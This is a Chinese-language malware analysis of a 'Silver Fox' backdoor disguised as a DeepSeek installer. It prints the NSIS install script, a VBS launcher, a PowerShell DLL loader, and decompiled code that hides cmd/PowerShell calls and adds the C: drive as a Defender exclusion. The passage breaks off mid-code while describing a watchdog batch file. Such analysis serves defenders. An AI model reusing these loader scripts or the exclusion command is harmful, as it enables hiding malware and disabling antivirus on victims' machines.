背景
近期,AI大模型领域热度飙升,DeepSeek等开源大模型成为开发者与普通用户的热门选择。攻击者敏锐捕捉到这一趋势,将恶意软件伪装成"DeepSeek大模型自动安装助手",利用用户对技术工具的迫切需求实施精准社工攻击。"银狐"家族作为长期活跃的APT组织,擅长通过热点事件伪造合法软件,此次攻击是其新型社会工程学策略的典型体现。该样本来源于《银狐突袭!DeepSeek本地化部署暗藏“致命陷阱”》一文。
2.恶意文件分析
拖入DIE(Detect It Easy)中,发现是由NSIS打包而成的
使用7zip-nsis解包
其中.nsi文件为安装配置,关键部分如下。在$APPDATA\Axialis目录释放文件之后,执行Decision.vbs,然后再将真正的ds大模型安装助手的快捷方式放置于桌面。

Section MainSection ; Section_0
  ; AddSize 136708
  Sleep 500
  SetOutPath $APPDATA\Axialis
  Sleep 500
  File Config.ini
  Sleep 500
  File Config2.ini
  Sleep 500
  File silently.ps1
  Sleep 500
  File Update.dll
  Sleep 500
  File Decision.vbs
  Sleep 500
  Exec "wscript //B $\"$APPDATA\Axialis\Decision.vbs$\""
  SetOutPath $INSTDIR
  Sleep 500
  Sleep 500
  SetOverwrite ifnewer
  File ds大模型安装助手_1.0.0.6_1740119628.exe
  Sleep 500
  CreateShortCut $DESKTOP\ds大模型安装助手_1.0.0.6_1740119628.lnk $INSTDIR\ds大模型安装助手_1.0.0.6_1740119628.exe
SectionEnd
2.1程序执行流程
2.2程序分析
2.2.1关联启动恶意进程
解包后,$APPDATA\Axialis目录下释放的文件即为后门程序
首先是Decision.vbs,用于启动同路径下的silently.ps1文件
' Decision.vbs: first-stage launcher dropped to %APPDATA%\Axialis by the NSIS installer.
' It resolves silently.ps1 next to itself and starts it through the 32-bit (SysWow64)
' PowerShell host with -ExecutionPolicy Bypass.
Set objShell = CreateObject("WScript.Shell")
RoamingPath = objShell.ExpandEnvironmentStrings("%APPDATA%")
FilePath = RoamingPath & "\Axialis\silently.ps1"
' Run(command, 0, False): window style 0 hides the console window; False returns
' immediately instead of waiting for PowerShell to exit.
' Detection note: the observable here is the process chain
' wscript.exe //B -> SysWow64 powershell.exe -ExecutionPolicy Bypass -File <script under %APPDATA%>.
objShell.Run "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File """ & FilePath & """", 0, False
silently.ps1文件内容如下,用于启动同路径下的Update.dll的导出函数TCGamerUpdateMain(通过Add-Type动态编译一段C# P/Invoke代码完成调用)。

$RoamingDir = [Environment]::GetFolderPath('ApplicationData')
$DllPath = Join-Path $RoamingDir "Axialis\Update.dll"
$DllPathEscaped = $DllPath -replace '\', '\\'
$code = @"
using System;
using System.Runtime.InteropServices;
public class DllInvoker
{
    [DllImport("$DllPathEscaped", CallingConvention = CallingConvention.Cdecl)]
    public static extern void TCGamerUpdateMain();
}
"@
Add-Type -TypeDefinition $code
[DllInvoker]::TCGamerUpdateMain()
Update.dll的导出函数TCGamerUpdateMain被调用后,首先创建互斥体保证只有一个实例运行,然后获取C:\Users\<username>\AppData\Roaming\Axialis 这个路径下的Config2.ini文件。
然后在内存中加载shellcode
shellcode创建线程执行操作
// Decompiler output (IDA pseudo-C) of the routine the in-memory shellcode
// starts. It does three things: an initial delay, a fan-out into five worker
// threads, and a second delay before handing off to two unnamed targets.
//
// NOTE(review): the decompiler's argument assignment on the two
// GetCurrentThread/WaitForSingleObject pairs is off (GetCurrentThread takes no
// argument, WaitForSingleObject takes two); each pair most plausibly reads
// WaitForSingleObject(GetCurrentThread(), 5000). Waiting on the caller's own
// thread pseudo-handle never completes, so each pair is in effect a 5 s sleep,
// which also pads out short-timeout sandbox runs. Confirm under a debugger.
int sub_10014540()
{
  int v0; // eax
  int v1; // eax

  // ~5 s delay before any worker starts (see note above).
  v0 = ((int (__stdcall *)(int))kernel32_GetCurrentThread)(5000);
  ((void (__stdcall *)(int))kernel32_WaitForSingleObject)(v0);

  // Five worker threads, all created with default attributes/stack/flags and
  // no thread argument. Per the write-up, sub_10013F20 is "thread 1": it runs
  // `powershell ... Add-MpPreference -ExclusionPath 'C:\'` through cmd.exe to
  // exclude the whole C: drive from Defender. "Thread 2" sets up the
  // monitor.bat watchdog, but the write-up does not say which of the remaining
  // four entry points that is, and the other three are not described here.
  // Detection: the thread fan-out itself is unremarkable; the observable
  // artefacts are the child processes (cmd.exe -> powershell Add-MpPreference,
  // the batch file written under %TEMP%) covered in the later sections.
  ((void (__stdcall *)(_DWORD, _DWORD, int (__usercall *)@(int@), _DWORD, _DWORD, _DWORD))kernel32_CreateThread)(0,0,sub_10013F20,0,0,0);
  ((void (__stdcall *)(_DWORD, _DWORD, void *, _DWORD, _DWORD, _DWORD))kernel32_CreateThread)(0,0,&sub_1000A9F0,0,0,0);
  ((void (__stdcall *)(_DWORD, _DWORD, void *, _DWORD, _DWORD, _DWORD))kernel32_CreateThread)(0,0,&sub_100137E0,0,0,0);
  ((void (__stdcall *)(_DWORD, _DWORD, void *, _DWORD, _DWORD, _DWORD))kernel32_CreateThread)(0,0,&sub_10014390,0,0,0);
  ((void (__stdcall *)(_DWORD, _DWORD, void *, _DWORD, _DWORD, _DWORD))kernel32_CreateThread)(0,0,&sub_100142F0,0,0,0);

  // Second ~5 s delay, then control passes to a location the decompiler could
  // not type as a function (byte_10013450) and to an unresolved pointer called
  // with 0 (unk_1001DC47) -- presumably the hand-off to the next stage; neither
  // target is shown in the write-up.
  v1 = ((int (__stdcall *)(int))kernel32_GetCurrentThread)(5000);
  ((void (__stdcall *)(int))kernel32_WaitForSingleObject)(v1);
  ((void (*)(void))byte_10013450)();
  ((void (__stdcall *)(_DWORD))unk_1001DC47)(0);
  return 0;
}
2.2.2线程1:将c盘添加到杀软白名单
通过执行指令powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"将C盘添加到Windows Defender白名单中。从下面的反编译代码可以看到,该命令是以cmd.exe /C为载体、通过ShellExecuteEx启动的(从结构体字段布局看,nShow为0,即SW_HIDE,窗口隐藏),随后用WaitForSingleObject等待其执行结束并关闭句柄。

int __usercall sub_10013F20@(int a1@)
{
  v37 = a1;
  v38 = retaddr;
  v36 = -1;
  v35 = &unk_10032941;
  ExceptionList = NtCurrentTeb()->NtTib.ExceptionList;
  *(_DWORD *)&v33[1] = &v39;
  v28 = sub_10007310((char *)&v29 + 1);
  qmemcpy(v30, "powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"", sizeof(v30));
  ---------------------------------省略部分内容----------------------------------------
  qmemcpy(v32, "/C ", sizeof(v32));
  ---------------------------------省略部分内容----------------------------------------
  ((void (__cdecl *)(_DWORD *, _DWORD, int))unk_10017060)(v13, 0, 56);
  v13[0] = 64;
  v13[1] = 0;
  v13[2] = "open";
  v13[3] = "cmd.exe";
  v13[4] = string(v11);
  v13[5] = 0;
  v13[6] = 0;
  if ( ((int (__stdcall *)(int *))shell32_ShellExecuteEx)(&v12) && v14 )
  {
    ((void (__stdcall *)(int, int))kernel32_WaitForSingleObject)(v14, -1);
    ((void (__stdcall *)(int))kernel32_CloseHandle)(v14);
  }
  return maybe_alloc(v11);
}
2.2.3线程2:创建守护进程
执行流程如下
写入monitor.bat并执行
复制代码 隐藏代码int __cdecl sub_10002D00(void *a1){((void (__stdcall *)(int, _BYTE *))kernel32_GetTempPathA)(260, v6);str_addr = get_str_addr(v11, (int)v6);v22 = str_addr;v24 = 0;str_concat((int)v13, str_addr, (int)"target.pid");LOBYTE(v24) = 2;maybe_alloc(v11);v21 = get_str_addr(v10, (int)v6);v20 = v21;LOBYTE(v24) = 3;str_concat((int)v14, v21, (int)"monitor.bat");LOBYTE(v24) = 5;maybe_alloc(v10);create_file(v12, v14, 2, 64, 1);LOBYTE(v24) = 6;if ( (unsigned __int8)((int (__thiscall *)(char *))judge_exist)(v12) ){((void (__cdecl *)(char *, const char *))write)(v12, "@echo offn");((void (*)(char *, const char *, ...))write)(v12, "set "PIDFile=%TEMP%\target.pid"n");v1 = ((int (__cdecl *)(char *, const char *))write)(v12, "set "VBSPath=");v2 = write_2(v1, a1);((void (__cdecl *)(int, void *))write)(v2, &unk_1003ACB8);((void (*)(char *, const char *, ...))write)(v12, "set /p pid= nuln");((void (__cdecl *)(char *, const char *))write)(v12, "if errorlevel 1 (n");((void (*)(char *, const char *, ...))write)(v12, "cscript //nologo "%VBSPath%"n");((void (__cdecl *)(char *, const char *))write)(v12, "exi